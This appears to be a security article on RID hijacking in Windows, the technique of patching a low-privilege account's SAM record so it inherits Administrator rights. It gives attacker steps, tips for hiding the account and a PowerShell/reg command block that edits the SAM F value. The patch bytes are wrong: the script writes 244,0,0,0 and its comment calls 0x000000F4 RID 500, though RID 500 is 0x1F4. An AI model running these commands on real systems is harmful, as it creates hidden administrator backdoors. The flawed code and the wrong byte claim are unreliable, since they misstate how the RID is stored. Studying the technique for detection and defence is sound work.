RID (Relative Identifier) is the last component of a Windows Security Identifier (SID) that uniquely identifies a user or group. By default, the built-in Administrator account has RID 500, Guest is 501, and new local users typically start at 1000. In a RID Hijacking attack, adversaries modify the RID of a low-privilege account so that the system mistakenly grants it the privileges of a high-value account commonly the Administrator providing stealthy, persistent access without creating new accounts or altering group memberships.

RID Hijacking

How Attackers Use RID Hijacking

Obtain SYSTEM privileges (e.g., via PsExec or JuicyPotato) to unlock and mount the protected SAM registry hive.

             Example of file permission when using the PsExec command (SYSTEM)

Create or select a low-privilege account, often appending a “$” to its name (e.g., admin$) to hide it from standard listings.
Modify the RID value within the binary F value at offset 0x30 in the user’s SAM registry key so it matches 500 (Administrator).
Optional concealment: delete and re-import registry blobs or use tools like CreateHiddenAccount to automate RID cloning and hide account records via regini.

Modifying RID Value (Example Commands)

# Mount the SAM hive
reg load HKLM\\TempSAM C:\\Windows\\System32\\config\\SAM

# Read and patch the binary F value at offset 0x30
$key = 'HKLM:\\TempSAM\\SAM\\Domains\\Account\\Users\\000001F5'
$binary = (Get-ItemProperty -Path $key -Name 'F').'F'
$binary[48..51] = [byte[]](244,0,0,0)    # Little-endian 0x000000F4 → RID 500
Set-ItemProperty -Path $key -Name 'F' -Value $binary

# Unmount the SAM hive
reg unload HKLM\\TempSAM

Notes:

The F value is a REG_BINARY blob containing user flags, timestamps, and RID at offset 0x30.
Tools like CreateHiddenAccount leverage regini to adjust SAM permissions and automate these steps.